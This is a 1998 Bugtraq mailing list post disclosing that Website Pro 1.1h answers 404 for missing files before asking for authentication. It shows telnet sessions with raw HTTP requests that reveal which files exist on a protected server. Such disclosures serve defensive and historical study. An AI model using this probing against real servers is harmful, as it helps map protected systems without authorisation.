Bugtraq mailing list archives
Flaw in HTTP-Authentication in O'Reilly Website Pro
From: bk () arena cwnet com (BarKode)
Date: Fri, 24 Apr 1998 03:14:02 +0000
Greetings... I went to download a file I'd stashed away on a machine at work running Website Pro 1.1h, with HTTP-Authentication required to access the site at all. I mistyped the name and to my astonishment got a 404 error. This only surprised me because I had just started the browser, and had not yet been prompted for a username and password (Authentication-basic style). Problem: You can remotely check for existence of files and directory structures on a machine running Web Site Pro 1.1. Observe: Here we will try to access index.html, a file which exists on the protected host. thunder:~$ telnet protected.host.com 80 Trying 1.2.3.4... Connected to protected.host.com. Escape character is '^]'. GET / HTTP/1.0 HTTP/1.0 401 Unauthorized Date: Fri, 24 Apr 1998 09:33:46 GMT Server: WebSitePro/1.1h Accept-ranges: bytes WWW-Authenticate: Basic realm="Web Server" Content-length: 156 <HTML><HEAD><TITLE>Authorization Required</TITLE></HEAD> <BODY><H1>Authorization Required</H1> Authentication (Basic) failed or was missing. </BODY></HTML> Connection closed by foreign host. ****** Now we try to access a file that does *not* exist. thunder:~$ telnet protected.host.com 80 Trying 1.2.3.4... Connected to protected.host.com. Escape character is '^]'. GET /nothere.html HTTP/1.0 HTTP/1.0 404 Not Found Date: Fri, 24 Apr 1998 09:35:42 GMT Server: WebSitePro/1.1h Accept-ranges: bytes Content-type: text/html Content-length: 207 <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY><H1>404 Not Found</H1> The requested URL was not found on this server:<P><CODE>/nothere.html<P>(C:/WebS ite/htdocs/nothere.html)</CODE><P> </BODY></HTML> Connection closed by foreign host. ***** No mention whatsoever of Authentication, the server spewed forth a 404 document, gleefully stating the file we want isn't there. The same situation posed under Apache 1.2.5 returns a '401 Unauthorized' in either situation. Contacted O'Reilly, awaiting response.... -Matt
Current thread:
- More Microsoft debri Lloyd Vancil (Apr 23)
- <Possible follow-ups>
- Re: More Microsoft debri Michael Howard (Apr 23)
- Re: More Microsoft debri pedward () WEBCOM COM (Apr 23)
- Re: More Microsoft debri James E. Robinson, III (Apr 23)
- Another Frontpage Bug, with promiscuous ScriptAliases pedward () WEBCOM COM (Apr 23)
- Flaw in HTTP-Authentication in O'Reilly Website Pro BarKode (Apr 23)
- Re: Another Frontpage Bug, with promiscuous ScriptAliases Marc Slemko (Apr 23)
- How to exploit AlephOne by JP of AntiOnline F0RMiCA (Apr 24)
- Security Hole in Netscape Enterprise Server 3.0 Daragh Malone (Apr 24)
- Re: Security Hole in Netscape Enterprise Server 3.0 Matthew Frederick (Apr 24)
- How to exploit mudge by AlephOne by JP AntiOnline Dr. Mudge (Apr 24)
- Re: How to exploit mudge by AlephOne by JP AntiOnline Aleph One (Apr 24)
- Re: More Microsoft debri pedward () WEBCOM COM (Apr 23)